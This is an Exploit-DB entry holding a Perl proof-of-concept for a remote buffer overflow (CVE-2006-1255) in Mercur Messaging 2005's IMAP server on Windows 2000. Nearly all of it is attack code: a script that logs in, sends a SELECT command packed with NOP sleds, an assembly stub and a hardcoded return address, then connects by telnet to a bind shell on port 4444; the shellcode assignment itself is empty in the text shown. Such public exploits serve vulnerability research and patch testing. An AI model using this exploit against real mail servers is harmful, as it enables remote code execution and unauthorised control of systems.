Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit

ID EDB-ID:3133
Type exploitdb
Reporter Jacopo Cervini
Modified 2007-01-15T00:00:00


Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit. CVE-2006-1255. Remote exploit for windows platform

# tested on win2k server SP4 English
# ATTENTION! If you have an another valid account you must change the offsets this is only a poc

use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 143;
my $reply;
my $request;
my $user = "test";
my $pass = "test";

my $nop = "\x90"x8;

my $nop1 = "\x90"x20;

my $ret = "\x42\xb2\xc1\x40";

#my $ret = "\x42\x42\x42\x42"; #call edi in mcrimap4.exe

my $asm="\x8b\xc7\x83\xc0\x23\x50\xc3";

#	asm is a binary translation of these assembly instructions;eax now have the correct memory address for shellcode
#	8BC7           MOV EAX,EDI
#	83C0 23        ADD EAX,23
#	50             PUSH EAX                                
#	C3             RETN

#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host

my $shellcode = 

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "a001 LOGIN $user $pass\r\n";

send $socket, $request, 0;
print "[+] Sent login\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = " SELECT " . $nop . $asm . $nop1 . $shellcode . $ret ."\r\n";

send $socket, $request, 0;
print "[+] Sent chunk\n";

print " + Connect on port 4444 of $host ...\n";
system("telnet $host 4444");

close $socket;

# [2007-01-15]